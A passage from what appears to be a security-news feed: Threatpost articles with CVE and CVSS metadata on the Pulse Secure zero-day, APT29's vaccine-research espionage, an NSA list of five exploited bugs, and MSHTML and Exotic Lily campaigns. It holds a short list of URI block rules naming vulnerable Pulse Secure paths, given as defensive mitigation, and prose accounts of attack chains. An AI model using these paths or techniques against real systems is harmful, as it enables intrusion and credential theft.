Secure Collaboration features on the appliance.\n\nUser can also use the blacklisting feature to disable URL-based attacks, the firm noted, by blocking the following URIs:\n\n * ^/+dana/+meeting\n * ^/+dana/+fb/+smb\n * ^/+dana-cached/+fb/+smb\n * ^/+dana-ws/+namedusers\n * ^/+dana-ws/+metric\n\n\u201cThe Pulse Connect Secure (PCS) team is in contact with a limited number of customers who have experienced evidence of exploit behavior on their PCS appliances,\u201d according to Pulse Secure. \u201cThe PCS team has provided remediation guidance to these customers directly.\u201d\n\nAccording to tandem research from Mandiant, this and the other bugs are at the center of a flurry of activity by different threat actors, involving 12 different malware families overall. The malware is used for authentication-bypass and establishing backdoor access to the VPN devices, and for lateral movement. Two specific advanced persistent threat (APT) groups, UNC2630 and UNC2717, are particularly involved, researchers said.\n\n## **UNC2630 Cyber-Activity: Links to China**\n\n\u201cWe observed UNC2630 harvesting credentials from various Pulse Secure VPN login flows, which ultimately allowed the actor to use legitimate account credentials to move laterally into the affected environments,\u201d according to Mandiant, in a [Tuesday posting](<https://www.fireeye.com/blog/threat-research/2021/04/suspected-apt-actors-leverage-bypass-techniques-pulse-secure-zero-day.html>). \u201cIn order to maintain persistence to the compromised networks, the actor utilized legitimate, but modified, Pulse Secure binaries and scripts on the VPN appliance.\u201d\n\nThe firm tracks those tools as the following:\n\n * **SlowPulse:** Trojanized shared objects with malicious code to log credentials and bypass authentication flows within the legitimate Pulse Secure shared object libdsplibs.so, including multifactor authentication requirements.\n * **RadialPulse and PulseCheck:** Web shells injected into legitimate, internet-accessible Pulse Secure VPN appliance administrative web pages.\n * **ThinBlood:** A utility used to clear relevant log files.\n * **Other capabilities:** Toggling the filesystem between Read-Only and Read-Write modes to allow for file modification on a typically Read-Only filesystem; the ability to maintain persistence across VPN appliance general upgrades that are performed by the administrator; and the ability to unpatch modified files and delete utilities and scripts after use to evade detection.\n\nUNC2630 targeted U.S. defense-sector companies as early as last August, Mandiant noted. It added that the activity could be state-sponsored, likely backed by China.\n\n\u201cWe suspect UNC2630 operates on behalf of the Chinese government and may have ties to APT5,\u201d according to the analysis. \u201cUNC2630\u2019s combination of infrastructure, tools, and on-network behavior appear to be unique, and we have not observed them during any other campaigns or at any other engagement. Despite these new tools and infrastructure, Mandiant analysts noted strong similarities to historic intrusions dating back to 2014 and 2015 and conducted by Chinese espionage actor APT5.\u201d\n\nAPT5 consistently targets defense and technology companies in the Asia, Europe and the U.S., Mandiant noted.\n\n\u201c[It] has shown significant interest in compromising networking devices and manipulating the underlying software which supports these appliances,\u201d Mandiant researchers said. \u201cAPT5 persistently targets high value corporate networks and often re-compromises networks over many years. Their primary targets appear to be aerospace and defense companies located in the U.S., Europe, and Asia. Secondary targets (used to facilitate access to their primary targets) include network appliance manufacturers and software companies usually located in the U.S.\u201d\n\n## **The UNC2717 APT Connection**\n\nAs for UNC2717, Mandiant linked Pulse Secure zero-day activity back to the APT in a separate incident in March, targeted against an unnamed European organization. UNC2717 was also seen targeting global government agencies between October and March.\n\nSo far, there\u2019s not enough evidence about UNC2717 to determine government sponsorship or suspected affiliation with any known APT group, Mandiant said.\n\nThe tools used by this group include HardPulse, which is a web shell; PulseJump, used for credential-harvesting; and RadialPulse. The firm also observed a new malware that it calls LockPick, which is a trojanized OpenSSL library file that appears to weaken encryption for communications used by the VPN appliances.\n\nAll of the malware families in use in the campaigns appear to be loosely related, according to Mandiant.\n\n\u201cAlthough we did not observe PulseJump or HardPulse used by UNC2630 against U.S. [defense] companies, these malware families have shared characteristics and serve similar purposes to other code families used by UNC2630,\u201d researchers said.\n\nThey added, \u201cMandiant cannot associate all the code families described in this report to UNC2630 or UNC2717. We also note the possibility that one or more related groups is responsible for the development and dissemination of these different tools across loosely connected APT actors.\u201d\n\n## **Pulse Secure: A Favorite Target for APTs**\n\nPulse Secure VPNs continue to be a hot target for nation-state actors. Last week, [the FBI warned](<https://threatpost.com/nsa-security-bugs-active-nation-state-cyberattack/165446/>) that a known arbitrary file-read Pulse Secure bug (CVE-2019-11510) was part of five vulnerabilities under attack by the Russia-linked group known as APT29 (a.k.a. Cozy Bear or The Dukes). APT29 is conducting \u201cwidespread scanning and exploitation against vulnerable systems in an effort to obtain authentication credentials to allow further access,\u201d according to the Feds.\n\nMeanwhile, earlier in April, the Department of Homeland Security (DHS) urged companies that use Pulse Secure VPNs to change their passwords for Active Directory accounts, because in many cases, attackers have already exploited CVE-2019-11510 to hoover up victims\u2019 credentials \u2013 and now are using those credentials to move laterally through organizations, [DHS warned](<https://threatpost.com/dhs-urges-pulse-secure-vpn-users-to-update-passwords/154925/>).\n\nAnd last fall, the Cybersecurity and Infrastructure Security Agency (CISA) said that a federal agency had suffered a successful espionage-related cyberattack that led to a backdoor and multistage malware being dropped on its network. Once again, [CVE-2019-11510 was in play](<https://threatpost.com/feds-cyberattack-data-stolen/159541/>), used to gain access to employees\u2019 legitimate Microsoft Office 365 log-in credentials and sign into an agency computer remotely.\n\n\u201cAlmost without fail, the common thread with any APT is the exploitation of known vulnerabilities both new and old,\u201d Yaniv Bar-Dayan, CEO and co-founder at Vulcan Cyber, said via email. \u201cMalicious activity, whether using a supply-chain vector or a VPN authentication bypass, is thwarted by good cyber-hygiene practices and serious blue teaming. Vulnerability management, or more importantly vulnerability remediation, is a cybersecurity dirty job that is under-resourced and underappreciated and businesses are paying the price.\u201d\n\n**Download our exclusive FREE Threatpost Insider eBook,** **_\u201c[2021: The Evolution of Ransomware](<https://threatpost.com/ebooks/2021-the-evolution-of-ransomware/?utm_source=April_eBook&utm_medium=ART&utm_campaign=ART>),\u201d_**** to help hone your cyber-defense strategies against this growing scourge. We go beyond the status quo to uncover what\u2019s next for ransomware and the related emerging risks. Get the whole story and [DOWNLOAD](<https://threatpost.com/ebooks/2021-the-evolution-of-ransomware/?utm_source=April_eBook&utm_medium=ART&utm_campaign=ART>) the eBook now \u2013 on us!**\n", "cvss3": {}, "published": "2021-04-21T15:35:37", "type": "threatpost", "title": "Pulse Secure Critical Zero-Day Security Bug Under Active Exploit", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2019-11510", "CVE-2020-8243", "CVE-2020-8260", "CVE-2021-22893"], "modified": "2021-04-21T15:35:37", "id": "THREATPOST:2BD1A92D071EE3E52CB5EA7DD865F60A", "href": "https://threatpost.com/pulse-secure-critical-zero-day-active-exploit/165523/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-07-16T19:56:37", "description": "The advanced threat actor known as APT29 has been hard at work attempting to pilfer COVID-19 vaccine research from academic and pharmaceutical research institutions in various countries around the world, including the U.S.\n\nThat\u2019s according to a joint alert from the U.S. Department of Homeland Security (DHS), the U.K.\u2019s National Cyber Security Centre (NCSC) and Canada\u2019s Communications Security Establishment (CSE), [issued Thursday](<https://www.ncsc.gov.uk/news/advisory-apt29-targets-covid-19-vaccine-development>).\n\nThe 14-page advisory details the recent activity of Russia-linked APT29 (a.k.a. CozyBear or the Dukes), including the use of custom malware called \u201cWellMess\u201d and \u201cWellMail\u201d for data exfiltration.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\n\u201cThroughout 2020, APT29 has targeted various organizations involved in COVID-19 vaccine development in Canada, the United States and the United Kingdom, highly likely with the intention of stealing information and intellectual property relating to the development and testing of COVID-19 vaccines,\u201d the report noted.\n\nThis specific activity was seen starting in April, but security researchers noted that nation-state espionage targeted to coronavirus treatments and cures [has been a phenomenon all year](<https://threatpost.com/nation-backed-apts-covid-19-spy-attacks/155082/>).\n\n\u201cCOVID-19 is an existential threat to every government in the world, so it\u2019s no surprise that cyber-espionage capabilities are being used to gather intelligence on a cure,\u201d said John Hultquist, senior director of analysis at Mandiant Threat Intelligence, via email. \u201cThe organizations developing vaccines and treatments for the virus are being heavily targeted by Russian, Iranian and Chinese actors seeking a leg up on their own research. We\u2019ve also seen significant COVID-related targeting of governments that began as early as January.\u201d\n\n## **Exploits in Play**\n\nTo mount the attacks, APT29 is using exploits for known vulnerabilities to gain initial access to targets, according to the analysis, along with spearphishing to obtain authentication credentials to internet-accessible login pages for target organizations. The exploits in rotation include the recent [Citrix code-injection bug](<https://threatpost.com/citrix-bugs-allow-unauthenticated-code-injection-data-theft/157214/>) (CVE-2019-19781); a publicized [Pulse Secure VPN flaw](<https://threatpost.com/dhs-urges-pulse-secure-vpn-users-to-update-passwords/154925/>) (CVE-2019-11510); and issues in FortiGate (CVE-2018-13379) and Zimbra (CVE-2019-9670).\n\n\u201cThe group conducted basic vulnerability scanning against specific external IP addresses owned by the [targeted] organizations,\u201d according to the report. \u201cThe group then deployed public exploits against the vulnerable services identified. The group has been successful using recently published exploits to gain initial footholds.\u201d\n\nOnce a system is compromised, the group then looks to obtain additional authentication credentials to allow further access and spread laterally.\n\n## **Custom Malware**\n\nOnce established in a network, APT29 is employing homegrown malware that the NCSC is calling WellMess and WellMail, to conduct further operations on the victim\u2019s system and exfiltrate data.\n\nWellMess, first discovered in July 2018, is malware that comes in Golang or .NET versions and supports HTTP, TLS and DNS for communications.\n\nNamed after one of the function names in the malware, \u201cWellMess is a lightweight malware designed to execute arbitrary shell commands, upload and download files,\u201d according to the advisory.\n\nWellMail malware meanwhile, named after file paths containing the word \u2018mail\u2019 and the use of server port 25, is also lightweight \u2013 and is designed to run commands or scripts while communicating with a hardcoded command-and-control (C2) server.\n\n\u201cThe binary is an ELF utility written in Golang which receives a command or script to be run through the Linux shell,\u201d according to the NCSC. \u201cTo our knowledge, WellMail has not been previously named in the public domain.\u201d\n\nBoth malwares uses hard-coded client and certificate authority TLS certificates to communicate with their C2 servers.\n\n\u201cWellMess and WellMail samples contained TLS certificates with the hard-coded subjectKeyIdentifier (SKI) \u20180102030406\u2019, and used the subjects \u2018C=Tunis, O=IT\u2019 and \u2018O=GMO GlobalSign, Inc\u2019 respectively,\u201d detailed the report. \u201cThese certificates can be used to identify further malware samples and infrastructure. Servers with this GlobalSign certificate subject may be used for other functions in addition to WellMail malware communications.\u201d\n\nAPT29 is also using another malware, dubbed \u2018SoreFang\u2019 by the NCSC, which is a first-stage downloader that uses HTTP to exfiltrate victim information and download second-stage malware. It\u2019s using the same C2 infrastructure as a WellMess sample, the agencies concluded.\n\nThis sample is not a custom job: \u201cIt is likely that SoreFang targets SangFor devices. Industry reporting indicates that other actors, reportedly including [DarkHotel](<https://threatpost.com/microsoft-zero-day-actively-exploited-patch/152018/>), have also targeted SangFor devices,\u201d noted the NCSC.\n\n## **APT29: A Sporadically High-Profile Threat**\n\n[APT29](<https://attack.mitre.org/groups/G0016/>) has long been seen targeting high-value targets across the think-tank, law enforcement, media, U.S. military, imagery, transportation, pharmaceutical, national government and defense contracting sectors.\n\nThe group is is perhaps best-known for the [intrusion](<https://threatpost.com/dnc-hacked-research-on-trump-stolen/118656/>) at the Democratic National Committee ahead of the U.S. presidential election in 2016. It was also implicated in [a widespread phishing campaign](<https://www.volexity.com/blog/2016/11/09/powerduke-post-election-spear-phishing-campaigns-targeting-think-tanks-and-ngos/>) in November 2016, in attacks against the White House, State Department and Joint Chiefs of Staff.\n\nIt was next seen in November 2017 [executing a Tor backdoor](<https://threatpost.com/apt29-used-domain-fronting-tor-to-execute-backdoor/124582/>), and then [it reemerged](<https://threatpost.com/apt29-re-emerges-after-2-years-with-widespread-espionage-campaign/139246/>) in 2018 with a widespread espionage campaign against military, media and public-sector targets.\n\nIts history stretches back a few years though: It [was also seen](<https://threatpost.com/white-house-state-department-counted-among-cozyduke-apt-victims/112382/>) by Kaspersky Lab carrying out data-mining attacks against the White House and the Department of State in 2014.\n\nResearchers from firms [like Mandiant](<https://www.fireeye.com/current-threats/apt-groups/rpt-apt29.html>) believe APT29 to be linked to Russian government-backed operations \u2013 an assessment that the DHS and NCSC reiterated in the latest advisory, saying that it is \u201calmost certainly part of the Russian intelligence services.\u201d\n\nWhile its publicly profiled activity tends to be sporadic, APT29 is rarely at rest, according to Mandiant\u2019s Hultquist.\n\n\u201cDespite involvement in several high-profile incidents, APT29 rarely receives the same attention as other Russian actors because they tend to quietly focus on intelligence collection,\u201d he said via email. \u201cWhereas GRU actors have brazenly leaked documents and carried out destructive attacks, APT29 digs in for the long term, siphoning intelligence away from its target.\u201d\n\nThis latest case is no exception to that M.O., according to the advisory: \u201cAPT29 is likely to continue to target organizations involved in COVID-19 vaccine research and development, as they seek to answer additional intelligence questions relating to the pandemic,\u201d the agencies concluded.\n\nThat said, at least one researcher warned that the end-game of the activity might be more nefarious than simply getting a leg up on a cure.\n\n\u201cAPT29 (Cozy Bear, Office Monkeys) has successfully demonstrated the extension of nation-state power through cyber-action for more than a dozen years,\u201d Michael Daly, CTO at Raytheon Intelligence & Space, said via email. \u201cHowever, they are not focused on simple intellectual property theft. Instead, their focus is rooted in influence operations \u2013 the changing of hearts and minds to thwart and diminish the power of governments and organizations.\u201d\n\nHe added, \u201cIn the case of this breach of vaccine research centers, we should be most concerned not that someone else might also get a vaccine, but that the information will be used to undermine the confidence of the public in the safety or efficacy of the vaccines, slowing their adoption, or in some way cause their release to be delayed. The effect of such a delay would be both impactful to the health of Western populations, but also to the social stability and economic stability of the West.\u201d\n", "cvss3": {}, "published": "2020-07-16T18:05:20", "type": "threatpost", "title": "Hackers Look to Steal COVID-19 Vaccine Research", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2018-13379", "CVE-2019-11510", "CVE-2019-19781", "CVE-2019-9670"], "modified": "2020-07-16T18:05:20", "id": "THREATPOST:1FB73160B6AAB2B0406816BB6A61E4CB", "href": "https://threatpost.com/state-sponsored-hackers-steal-covid-19-vaccine-research/157514/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-04-16T18:13:10", "description": "The Feds are warning that nation-state actors are once again after U.S. assets, this time in a spate of cyberattacks that exploit five vulnerabilities that affect VPN solutions, collaboration-suite software and virtualization technologies.\n\nAccording to the U.S. National Security Agency (NSA), which issued [an alert Thursday,](<https://www.nsa.gov/News-Features/Feature-Stories/Article-View/Article/2573391/russian-foreign-intelligence-service-exploiting-five-publicly-known-vulnerabili/%20/#pop5008885>) the advanced persistent threat (APT) group [known as APT29](<https://threatpost.com/state-sponsored-hackers-steal-covid-19-vaccine-research/157514/>) (a.k.a. Cozy Bear or The Dukes) is conducting \u201cwidespread scanning and exploitation against vulnerable systems in an effort to obtain authentication credentials to allow further access.\u201d\n\nThe targets include U.S. and allied national-security and government networks, it added.\n\n[](<https://threatpost.com/webinars/underground-markets-a-tour-of-the-dark-economy/?utm_source=ART&utm_medium=ART&utm_campaign=April_webinar>)\n\nJoin experts from Digital Shadows (Austin Merritt), Malwarebytes (Adam Kujawa) and Sift (Kevin Lee) to find out how cybercrime forums really work. FREE! Register by clicking above.\n\nThe five bugs under active attack are known, fixed security holes in platforms from Citrix, Fortinet, Pulse Secure, Synacor and VMware (detailed below) that organizations should patch immediately, researchers warned.\n\n\u201cSome of these vulnerabilities also have working Metasploit modules and are currently being widely exploited,\u201d said researchers with Cisco Talos, in a [related posting](<https://blog.talosintelligence.com/2021/04/nsa-svr-coverage.html#more>) on Thursday. \u201cPlease note that some of these vulnerabilities exploit applications leveraging SSL. This means that users should enable SSL decryption\u2026to detect exploitation of these vulnerabilities.\u201d\n\nThe NSA has linked APT29 to Russia\u2019s Foreign Intelligence Services (SVR). The news comes as the U.S. formally attributed the recent [SolarWinds supply-chain attack](<https://threatpost.com/solarwinds-orion-bug-remote-code-execution/163618/>) to the SVR and issued sanctions on Russia for cyberattacks and what President Biden called out as interference with U.S. elections.\n\n## **The 5 Vulnerabilities Being Actively Exploited**\n\nAccording to the NSA, the following are under widespread attack in cyber-espionage efforts:\n\n * CVE-2018-13379 Fortinet FortiGate SSL VPN (path traversal)\n * CVE-2019-9670 Synacor Zimbra Collaboration Suite (XXE)\n * CVE-2019-11510 Pulse Secure Pulse Connect Secure VPN (arbitrary file read)\n * CVE-2019-19781 Citrix Application Delivery Controller and Gateway (directory traversal)\n * CVE-2020-4006 VMware Workspace ONE Access (command injection)\n\n\u201cVulnerabilities in two VPN systems, two virtualization platforms and one collaboration solution seem to be a mighty combo,\u201d Dirk Schrader, global vice president of security research at New Net Technologies, told Threatpost. \u201cFour of them are 12 months or older, which is not a good sign for the overall cyber-hygiene in the U.S., given that all are either rated as severe or even critical in NIST\u2019s NVD. It looks like that adversaries can rely on the lack of diligence related to essential cybersecurity control, even more so in pandemic times.\u201d\n\n## **CVE-2018-13379**\n\nA directory traversal vulnerability in Fortinet FortOS allows unauthenticated attackers to access and download system files, by sending specially crafted HTTP resource requests. \u201cThis can result in the attacker obtaining VPN credentials, which could allow an initial foothold into a target network,\u201d according to Cisco Talos.\n\nThe NSA explained that it arises from an improper limitation of a pathname to a restricted directory. It affects Fortinet FortiOS 6.0.0 to 6.0.4, 5.6.3 to 5.6.7 and 5.4.6 to 5.4.12.\n\nThe nation-state issue is ongoing: Earlier in April, the FBI and the Cybersecurity and Infrastructure Security Agency (CISA) [warned that](<https://threatpost.com/fbi-apts-actively-exploiting-fortinet-vpn-security-holes/165213/>) APTs were actively exploiting the bug.\n\n## **CVE-2019-9670**\n\nThis bug is an XML External Entity Injection (XXE) vulnerability in the mailbox component of the Synacore Zimbra Collaboration Suite. Attackers can exploit it to gain access to credentials to further their access or as an initial foothold into a target network. It affects Synacor Zimbra Collaboration Suite 8.7.x before 8.7.11p10.\n\n## **CVE-2019-11510**\n\nIn Pulse Secure VPNs, a critical arbitrary file-reading flaw opens systems to exploitation from remote, unauthenticated attackers looking to gain access to a victim\u2019s networks. Attacker can send a specially crafted URI to trigger the exploit. It affects Pulse Connect Secure (PCS) 8.2 before 8.2R12.1, 8.3 before 8.3R7.1, and 9.0 before 9.0R3.4.\n\n\u201cThis can be abused by attackers to access sensitive information, including private keys and credentials,\u201d explained Cisco Talos researchers.\n\nLast April, the Department of Homeland Security (DHS) began urging companies that use Pulse Secure VPNs to change their passwords for Active Directory accounts, after several cyberattacks targeted companies who had previously patched a related flaw in the VPN family.\n\nAt the time, DHS [warned that attackers](<https://threatpost.com/dhs-urges-pulse-secure-vpn-users-to-update-passwords/154925/>) who have already exploited the flaw to snatch up victims\u2019 credentials were using those credentials to move laterally through organizations, rendering patches useless.\n\nThen September, a successful cyberattack on an unnamed federal agency [was attributed to](<https://threatpost.com/feds-cyberattack-data-stolen/159541/>) exploitation of the bug. \u201cIt is possible the cyber-actor obtained the credentials from an unpatched agency VPN server by exploiting a known vulnerability \u2013 CVE-2019-11510 \u2013 in Pulse Secure,\u201d according to CISA\u2019s alert at the time. \u201cCVE-2019-11510\u2026allows the remote, unauthenticated retrieval of files, including passwords. CISA has observed wide exploitation of CVE-2019-11510 across the federal government.\u201d\n\n## **CVE-2019-19781**\n\nThis critical directory-traversal vulnerability in the Citrix Application Delivery Controller (ADC) and Gateway that can allow remote code-execution. It was first disclosed as a zero-day in December 2019, after which Citrix [rolled out patches](<https://threatpost.com/citrix-patch-rollout-critical-rce-flaw/152041/>) amidst dozens of proof-of-concept exploits and skyrocketing exploitation attempts.\n\nIt affects Citrix ADC and Gateway versions before 13.0.47.24, 12.1.55.18, 12.0.63.13, 11.1.63.15 and 10.5.70.12 and SD-WAN WANOP 4000-WO, 4100-WO, 5000-WO, and 5100-WO versions before 10.2.6b and 11.0.3b.\n\n## **C****VE-2020-4006**\n\nAnd finally, a command-injection vulnerability in VMWare Workspace One Access, Access Connector, Identity Manager and Identity Manager Connector allows arbitrary command execution on underlying operating systems. A successful exploit does, however, require valid credentials to the configurator admin account, so it must be chained with another bug to use it.\n\nNonetheless, in December the NSA [warned that](<https://threatpost.com/nsa-vmware-bug-under-attack/161985/>) foreign adversaries were zeroing in on exploiting the flaw, despite patches rolling out just days earlier. State actors were using the bug to pilfer protected data and abuse shared authentication systems, it said.\n\nIt affects VMware One Access 20.01 and 20.10 on Linux, VMware Identity Manager 3.3.1 \u2013 3.3.3 on Linux, VMware Identity Manager Connector 3.3.1 \u2013 3.3.3 and 19.03, VMware Cloud Foundation 4.0 \u2013 4.1, and VMware Vrealize Suite Lifecycle Manager 8.x.\n\n## **How Can I Protect Against Cyberattacks?**\n\nThe NSA recommended several best practices to protect organizations from attack:\n\n * Update systems and products as soon as possible after patches are released.\n * Assume a breach will happen; review accounts and leverage the latest eviction guidance available.\n * Disable external management capabilities and set up an out-of-band management network.\n * Block obsolete or unused protocols at the network edge and disable them in client device configurations.\n * Adopt a mindset that compromise happens: Prepare for incident response activities.\n\n\u201cIf publicly known, patchable exploits still have gas in the tank, this is just an indictment against the status-quo disconnect between many organizations\u2019 understanding of risk and basic IT hygiene,\u201d Tim Wade, technical director on the CTO team at Vectra, told Threatpost. \u201cThe unfortunate reality is that for many organizations, the barrier to entry into their network continues to be low-hanging fruit which, for one reason or another, is difficult for organizations to fully manage.\u201d\n\nHe added, \u201cThis underscores why security leaders should assume that for all the best intentions of their technology peers, compromises will occur \u2013 their imperative is to detect, respond and recover from those events to expel adversaries before material damage is realized.\u201d\n\n**_Ever wonder what goes on in underground cybercrime forums? Find out on April 21 at 2 p.m. ET during a _**[**_FREE Threatpost event_**](<https://threatpost.com/webinars/underground-markets-a-tour-of-the-dark-economy/?utm_source=ART&utm_medium=ART&utm_campaign=April_webinar>)**_, \u201cUnderground Markets: A Tour of the Dark Economy.\u201d Experts from Digital Shadows (Austin Merritt), Malwarebytes (Adam Kujawa) and Sift (Kevin Lee) will take you on a guided tour of the Dark Web, including what\u2019s for sale, how much it costs, how hackers work together and the latest tools available for hackers. _**[**_Register here_**](<https://threatpost.com/webinars/underground-markets-a-tour-of-the-dark-economy/?utm_source=ART&utm_medium=ART&utm_campaign=April_webinar>)**_ for the Wed., April 21 LIVE event. _**\n", "cvss3": {}, "published": "2021-04-16T18:10:09", "type": "threatpost", "title": "NSA: 5 Security Bugs Under Active Nation-State Cyberattack", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2018-13379", "CVE-2019-11510", "CVE-2019-19781", "CVE-2019-9670", "CVE-2020-4006"], "modified": "2021-04-16T18:10:09", "id": "THREATPOST:2E607CF584AE6639AC690F7F0CE8C648", "href": "https://threatpost.com/nsa-security-bugs-active-nation-state-cyberattack/165446/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-03-30T15:11:13", "description": "A [spearphishing](<https://threatpost.com/spearphishing-attack-spoofs-microsoft-office-365/162001/>) campaign targeting Russian citizens and government entities that are not aligned with the actions of the Russian government is the latest in numerous threats that have emerged since Russia invaded the Ukraine in February.\n\nResearchers from MalwareBytes identified a campaign last week that targets entities using websites, social networks, instant messengers and VPN services banned by the Kremlin, according [to a blog post](<https://blog.malwarebytes.com/threat-intelligence/2022/03/new-spear-phishing-campaign-targets-russian-dissidents/>) published Tuesday by Hossein Jazi, manager, threat intelligence analyst at MalwareBytes.\n\nTargets are receiving various emails that they will face charges due to this activity, with a lure to open a malicious attachment or link to find out more, Jazi wrote. The messages purport to be from the \u201cMinistry of Digital Development, Telecommunications and Mass Communications of the Russian Federation\u201d and the \u201cFederal Service for Supervision of Communications, Information Technology and Mass Communications,\u201d he said.\n\nMalwareBytes observed two documents associated with the campaign using the previously identified flaw [dubbed MSHTML](<https://threatpost.com/microsoft-mshtml-ryuk-ransomware/174780/>) and tracked as [CVE-2021-40444](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-40444>). The flaw, which [has been patched](<https://threatpost.com/microsoft-patch-tuesday-exploited-windows-zero-day/169459/>), is a remote-code execution (RCE) vulnerability in Windows that allows attackers to craft malicious Microsoft Office documents.\n\n\u201cEven though CVE-2021-40444 has been used in a few attacks in the past, to the best of our knowledge this was the first time we observed an attacker use RTF files instead of Word documents to exploit this vulnerability,\u201d Jazi wrote.\n\nMoreover, the threat actor used a new variant of an MSHTML exploit called CABLESS in the campaign, researchers said. [Sophos](<https://news.sophos.com/en-us/2021/12/21/attackers-test-cab-less-40444-exploit-in-a-dry-run/>) previously reported an attack that used this variant; however, in that case the actor did not use an RTF file, Jazi observed in the post.\n\nThe campaign also deviates from most other cyber threats that have arisen since Russia invaded Ukraine on Feb. 24, which typically tend to attack [targets in Ukraine](<https://threatpost.com/destructive-wiper-organizations-ukraine/178937/>) or others sympathetic to the war-torn country\u2019s cause.\n\n## **Attack Sequence**\n\nResearchers intercepted a number of emails being used in campaigns, all of which are in the Russian language. One in particular that they observed is a letter to a target about limitation of access to the Telegram application in Russia, according to the post.\n\nThe email includes an RTF with an embedded url that downloads an HTML file that exploits the MSHTML bug, researchers said. The HTML file contains a script that executes the script in Windows Script Host (WSF) data embedded in the RTF file, which contains a JavaScript code that can be accessed from a remote location.\n\n\u201cIn this case, this data has been accessed using the downloaded HTML exploit file,\u201d Jazi explained. \u201cExecuting this script leads to spawning PowerShell to download a CobaltStrike beacon from the remote server and execute it on the victim\u2019s machine.\u201d\n\n## **Potentially CarbonSpider at Work?**\n\nResearchers are unsure who is behind the campaign but noted the similarity of the lure as one used before and linked to the threat group [CarbonSpider](<https://prod.adversary.crowdstrike.cloud.jam3.net/en-US/adversary/carbon-spider/>), which in the past has targeted Russian financial institutions.\n\nA previous CarbonSpider campaign also used an email template claiming to be from the Federal Service for Supervision of Communications, Information Technology and Mass Communications as a lure, according to the post. In that campaign, the threat actor deployed a PowerShell-based remote-access trojan (RAT) in an obfuscated PowerShell script that used a combination of Base64 and custom obfuscation, according to the post.\n\nHidden inside the script was a RAT that could move the attack to the next stage and execute various payloads, including a JavaScript, PowerShell, Executable or DLL.\n\n\u201cThis RAT starts its activity by setting up some configurations which include the [command-and-control, or C2] URL, intervals, debug mode and a parameter-named group that initialized with \u2018Madagascar\u2019 which probably is the alias of the threat actor,\u201d Jazi wrote.\n\nBased on MalwareBytes\u2019 observations of the domains targeted in the campaign, potential victims are from a number of regional and federal government organizations, including: the authorities of the Chuvash Republic Official internet portal; the Russian Ministry of Internal Affairs; the Ministry of Education and Science of the Republic of Altai; the Ministry of Education of the Stavropol Territory; the Minister of Education and Science of the Republic of North Ossetia-Alania; and the Ministry of Science and Higher Education of the Russian Federation.\n\n**_Moving to the cloud? Discover emerging cloud-security threats along with solid advice for how to defend your assets with our _**[**_FREE downloadable eBook_**](<https://bit.ly/3Jy6Bfs>)**_, \u201cCloud Security: The Forecast for 2022.\u201d_** **_We explore organizations\u2019 top risks and challenges, best practices for defense, and advice for security success in such a dynamic computing environment, including handy checklists._**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-30T13:13:49", "type": "threatpost", "title": "MSHTML Flaw Exploited to Attack Russian Dissidents", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444", "CVE-2021-44228"], "modified": "2022-03-30T13:13:49", "id": "THREATPOST:A98C64CB9BDDE55F51C984B749753904", "href": "https://threatpost.com/mshtml-flaw-exploited-to-attack-russian-dissidents/179150/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-18T14:56:17", "description": "Google\u2019s Threat Analysis Group (TAG) has provided a rare look inside the operations of a cybercriminal dubbed \u201cExotic Lily,\u201d that appears to serve as an initial-access broker for both Conti and Diavol ransomware gangs.\n\nResearchers\u2019 analysis exposes the business-like approach the group takes to brokering initial access into organizations\u2019 networks through a range of tactics so its partners can engage in further malicious activity.\n\nWhile ransomware actors tend to get most of the attention, they can\u2019t do their dirty work without first gaining access to an organization\u2019s network. This is often the job of what are called initial-access brokers (IABs), or \u201cthe opportunistic locksmiths of the security world,\u201d as Google TAG calls them in [a blog post](<https://blog.google/threat-analysis-group/exposing-initial-access-broker-ties-conti/>) published Thursday.\n\n\u201cIt\u2019s a full-time job,\u201d Google TAG researchers Vlad Stolyarov and Benoit Sevens wrote in the post. \u201cThese groups specialize in breaching a target in order to open the doors \u2014 or the Windows \u2014 to the malicious actor with the highest bid.\u201d\n\nGoogle TAG first encountered Exotic Lily last September, when the group was doing just that \u2014 exploiting the [zero-day Microsoft flaw](<https://threatpost.com/microsoft-mshtml-ryuk-ransomware/174780/>) in MSHTML ([CVE-2021-40444](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-40444>)) as part of what turned out to be a full-time IAB business \u201cclosely linked with data exfiltration and deployment of human-operated ransomware such as Conti and Diavol,\u201d researchers wrote.\n\nAt the peak of the group\u2019s activity, Exotic Lily \u2014 which researchers believe is working with the Russian cybercrime gang known as FIN12, [Wizard Spider](<https://threatpost.com/wizard-spider-upgrades-ryuk-ransomware/149853/>) or DEV-0413 \u2014 was sending more than 5,000 emails a day to as many as 650 targeted organizations globally, they said.\n\n\u201cUp until November 2021, the group seemed to be targeting specific industries such as IT, cybersecurity and healthcare, but as of late we have seen them attacking a wide variety of 